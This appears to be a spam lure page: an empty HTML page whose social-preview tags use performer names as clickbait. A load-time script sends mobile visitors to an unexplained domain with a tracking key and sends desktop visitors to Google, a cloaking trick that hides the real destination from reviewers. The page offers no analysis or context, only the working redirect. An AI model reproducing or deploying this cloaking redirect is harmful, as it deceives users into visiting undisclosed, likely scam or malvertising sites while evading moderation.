


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome</title>

    <meta property="og:title" content="🩷 #Syren De Mer#Lindsay Lee#luxurypret


 ">
    <meta property="og:description" content="">
    <meta property="og:image" content="https://raw.githubusercontent.com/uh308759-sketch/reporty/c61540aa60e540d8012004a9ff83137cf22aa299/jaakm.svg">
    <meta property="og:url" content="https://bogavoidmemorize.com/k1cgzj7s?key=41d176614f6f5939eb4a0bfd70582e00">
    <meta property="og:type" content="website">

    <script>
    document.addEventListener('DOMContentLoaded', function() {
        var isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        var screenWidth = window.innerWidth;

        if (isMobile || screenWidth <= 768) {
            window.location.href = "https://bogavoidmemorize.com/k1cgzj7s?key=41d176614f6f5939eb4a0bfd70582e00";
        } else {
            window.location.href = "https://www.google.com";
        }
    });
    </script>
</head>
<body>
</body>
</html>
